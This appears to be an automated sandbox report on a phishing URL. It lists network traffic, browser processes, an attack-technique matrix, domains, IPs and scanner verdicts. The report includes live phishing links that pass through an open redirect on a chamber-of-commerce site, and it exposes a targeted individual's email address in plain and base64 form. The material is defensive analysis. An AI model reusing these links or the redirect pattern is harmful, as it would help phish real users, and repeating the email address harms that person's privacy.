      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.17:49786 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49790 version: TLS 1.2
      Source: classification engineClassification label: mal60.phis.win@18/87@36/16
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1972,i,5865964949357321470,7222999334076516600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1972,i,5865964949357321470,7222999334076516600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      3
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==0%Avira URL Cloudsafe
      https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      web.lehighvalleychamber.org0%VirustotalBrowse
      lehighvalleypacoc.weblinkconnect.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://recaptcha.net0%URL Reputationsafe
      https://efe.q39r.com/clKkFwlBHiHVSJ8Pe6bssjJAax4UIk5BlbqZlpC0mNq480%Avira URL Cloudsafe
      https://efe.q39r.com/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket0%Avira URL Cloudsafe
      https://efe.q39r.com/efe/?xXmaria.wojciechowski@co.monmouth.nj.us0%Avira URL Cloudsafe
      https://efe.q39r.com/345AebFBkUb4itsJp2dEx9Nz1WrklGGnhP4AVwQmYV891100%Avira URL Cloudsafe
      https://efe.q39r.com/uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh2540%Avira URL Cloudsafe
      https://efe.q39r.com/wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab1750%Avira URL Cloudsafe
      https://efe.q39r.com/90XMoG7YJNQ48AE7R9RefBV2W3ZP0TRtab710%Avira URL Cloudsafe
      https://efe.q39r.com/favicon.ico0%Avira URL Cloudsafe
      https://efe.q39r.com/12YCk90LK56Se1ynKqr420%Avira URL Cloudsafe
      https://efe.q39r.com/pq6n4pZVF34fr6WWmmuv390%Avira URL Cloudsafe
      https://efe.q39r.com/opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl451400%Avira URL Cloudsafe
      https://efe.q39r.com/efIbTPq3F3E9M4tIsfj78N3gmAo2XLQkl1000%Avira URL Cloudsafe
      https://efe.q39r.com/ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh781640%Avira URL Cloudsafe
      https://efe.q39r.com/uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T341260%Avira URL Cloudsafe
      https://efe.q39r.com/mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp901500%Avira URL Cloudsafe
      https://efe.q39r.com/56wgt99Sy67foh23sxX40uDyhst600%Avira URL Cloudsafe
      https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.0%Avira URL Cloudsafe
      https://efe.q39r.com/ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef2100%Avira URL Cloudsafe
      https://efe.q39r.com/opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd1960%Avira URL Cloudsafe
      https://sanemedia.ca/favicon.ico0%Avira URL Cloudsafe
      https://efe.q39r.com/23Y1SlAfZUj5ab3gLTPxy700%Avira URL Cloudsafe
      https://efe.q39r.com/ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe0%Avira URL Cloudsafe
      https://efe.q39r.com/wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab4300%Avira URL Cloudsafe
      https://efe.q39r.com/efe/0%Avira URL Cloudsafe
      https://efe.q39r.com/34fI8EabNdid67140%Avira URL Cloudsafe
      https://efe.q39r.com/pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop4200%Avira URL Cloudsafe
      https://efe.q39r.com/abx86uorshef280%Avira URL Cloudsafe
      https://efe.q39r.com/opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef2320%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ipapi.co
      172.67.69.226
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.130.137
          truefalse
            high
            d2vgu95hoyrpkh.cloudfront.net
            108.156.152.114
            truefalse
              high
              lehighvalleypacoc.weblinkconnect.com
              104.18.247.141
              truefalseunknown
              efe.q39r.com
              172.67.218.12
              truefalse
                unknown
                challenges.cloudflare.com
                104.17.3.184
                truefalse
                  high
                  www.google.com
                  142.250.9.104
                  truefalse
                    high
                    sanemedia.ca
                    162.241.120.242
                    truefalse
                      unknown
                      httpbin.org
                      34.196.110.25
                      truefalse
                        high
                        web.lehighvalleychamber.org
                        unknown
                        unknownfalseunknown
                        cdn.socket.io
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://efe.q39r.com/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocketfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://efe.q39r.com/clKkFwlBHiHVSJ8Pe6bssjJAax4UIk5BlbqZlpC0mNq48false
                          • Avira URL Cloud: safe
                          unknown
                          https://efe.q39r.com/efe/?xXmaria.wojciechowski@co.monmouth.nj.usfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://efe.q39r.com/345AebFBkUb4itsJp2dEx9Nz1WrklGGnhP4AVwQmYV89110false
                          • Avira URL Cloud: safe
                          unknown
                          https://efe.q39r.com/uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254false
                          • Avira URL Cloud: safe
                          unknown
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://efe.q39r.com/wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175false
                            • Avira URL Cloud: safe
                            unknown
                            https://efe.q39r.com/90XMoG7YJNQ48AE7R9RefBV2W3ZP0TRtab71false
                            • Avira URL Cloud: safe
                            unknown
                            https://efe.q39r.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://efe.q39r.com/12YCk90LK56Se1ynKqr42false
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/879faccbfe8fb06a/1714062180714/7a2eef3f3a2ffe6b8118994333b3f4d3ec1e526af4efd68e8961fa2dd086f191/MGHiH1uFJDsfTgOfalse
                              high
                              https://efe.q39r.com/pq6n4pZVF34fr6WWmmuv39false
                              • Avira URL Cloud: safe
                              unknown
                              https://efe.q39r.com/opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140false
                              • Avira URL Cloud: safe
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792false
                                high
                                https://efe.q39r.com/efIbTPq3F3E9M4tIsfj78N3gmAo2XLQkl100false
                                • Avira URL Cloud: safe
                                unknown
                                https://efe.q39r.com/ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164false
                                • Avira URL Cloud: safe
                                unknown
                                https://efe.q39r.com/uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126false
                                • Avira URL Cloud: safe
                                unknown
                                https://efe.q39r.com/mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/recaptcha/api.jsfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                    high
                                    https://efe.q39r.com/56wgt99Sy67foh23sxX40uDyhst60false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://a.nel.cloudflare.com/report/v4?s=4ozS%2FD%2BlhebByb9jaBaCRWoAEncGPbHpc01bkEyWlR9QzWHR%2FB9s%2F%2F50q%2BwlKuLB0VLH2U6N5aT1m2TFYtnVn1eP3Skjt1q0M%2BCesyWR3U00ru6Y6S3N5kKqF3Fs%2FQ%3D%3Dfalse
                                      high
                                      https://efe.q39r.com/ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://efe.q39r.com/opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://sanemedia.ca/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGfalse
                                        unknown
                                        https://efe.q39r.com/23Y1SlAfZUj5ab3gLTPxy70false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://efe.q39r.com/ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ipapi.co/185.152.66.230/json/false
                                          high
                                          https://efe.q39r.com/wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==false
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalfalse
                                              high
                                              https://efe.q39r.com/efe/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://efe.q39r.com/34fI8EabNdid6714false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://httpbin.org/ipfalse
                                                high
                                                https://efe.q39r.com/pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.ustrue
                                                  unknown
                                                  https://efe.q39r.com/abx86uorshef28false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==true
                                                    unknown
                                                    https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879faccbfe8fb06afalse
                                                        high
                                                        https://efe.q39r.com/opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/879faccbfe8fb06a/1714062180713/RjvXT6k7-qXYQHsfalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_94.1.drfalse
                                                            high
                                                            https://support.google.com/recaptcha#6262736chromecache_94.1.drfalse
                                                              high
                                                              https://support.google.com/recaptcha/?hl=en#6223828chromecache_94.1.drfalse
                                                                high
                                                                https://cloud.google.com/contactchromecache_94.1.drfalse
                                                                  high
                                                                  https://support.google.com/recaptcha/#6175971chromecache_94.1.drfalse
                                                                    high
                                                                    https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.chromecache_94.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    low
                                                                    https://www.google.com/recaptcha/api2/chromecache_94.1.dr, chromecache_112.1.drfalse
                                                                      high
                                                                      https://support.google.com/recaptchachromecache_94.1.drfalse
                                                                        high
                                                                        https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_94.1.drfalse
                                                                          high
                                                                          https://recaptcha.netchromecache_94.1.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.apache.org/licenses/chromecache_94.1.drfalse
                                                                            high
                                                                            https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_94.1.drfalse
                                                                              high
                                                                              https://play.google.com/log?format=json&hasfast=truechromecache_94.1.drfalse
                                                                                high
                                                                                https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_94.1.drfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  108.156.152.114
                                                                                  d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  3.221.38.252
                                                                                  unknownUnited States
                                                                                  14618AMAZON-AESUSfalse
                                                                                  142.250.9.104
                                                                                  www.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  172.67.218.12
                                                                                  efe.q39r.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  151.101.130.137
                                                                                  code.jquery.comUnited States
                                                                                  54113FASTLYUSfalse
                                                                                  104.17.3.184
                                                                                  challenges.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  239.255.255.250
                                                                                  unknownReserved
                                                                                  unknownunknownfalse
                                                                                  64.233.177.103
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.18.247.141
                                                                                  lehighvalleypacoc.weblinkconnect.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  34.196.110.25
                                                                                  httpbin.orgUnited States
                                                                                  14618AMAZON-AESUSfalse
                                                                                  35.190.80.1
                                                                                  a.nel.cloudflare.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  162.241.120.242
                                                                                  sanemedia.caUnited States
                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                  104.17.2.184
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  172.67.69.226
                                                                                  ipapi.coUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  IP
                                                                                  192.168.2.17
                                                                                  192.168.2.4
                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                  Analysis ID:1431758
                                                                                  Start date and time:2024-04-25 18:22:21 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 3m 54s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                  Sample URL:https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:19
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal60.phis.win@18/87@36/16
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, TextInputHost.exe
